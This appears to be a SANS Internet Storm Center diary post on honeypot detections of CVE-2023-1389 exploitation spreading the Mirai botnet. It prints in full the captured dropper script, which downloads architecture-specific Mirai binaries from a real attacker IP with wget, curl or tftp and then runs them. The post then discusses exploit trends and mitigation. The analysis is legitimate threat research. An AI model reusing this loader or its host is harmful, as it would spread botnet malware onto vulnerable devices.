Prophetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today

    Published: 2023-11-30
    Last Updated: 2023-11-30 03:34:23 UTC
    by John Bambenek (Version: 1)
    0 comment(s)

    Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this looking at new URL strings to our honepot network, and so for on 29 Nov 23, there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26 a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download a architecture-specific variant of Mirai.

    binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
    server_ip="45.95.146.26"\
    binout="system"
    exec="your device just got infected to a bootnoot"
    rm -rf $binout
    for arch in $binarys
      do
        rm -rf $arch
        cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
        chmod 777 $binout
        status=`./$binout $1`
        if [ "$status" = "$exec" ]; then
            rm -rf $binout
            break
        fi
        rm -rf $binout
      done

    The same IP hosted those binaries which were first seen on Virustotal on 24 November 2023 (See the ARM version report on VT here).

    If you take a look at our own data and generalize the exploit (example here) you see one spike in August and roughly small "noise level" exploitation and then today which so far has surpassed all our previous observation of exploit activity.

    The mitigation advice is the same, these devices probably shouldn't have internet facing admin panels but unfortunately the class of device suggests the people running them are also not likely reading such guidance much less have the ability or wherewithall to fix the issue and/or update their firmware.

    It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online which makes the expansion of Mirai that much more concerning.

    --
    John Bambenek
    bambenek \at\ gmail /dot/ com
    Bambenek Labs - Well Fed Intelligence

    0 comment(s)
    ISC Stormcast For Thursday, November 30th, 2023 https://isc.sans.edu/podcastdetail/8758

      Comments


      Diary Archives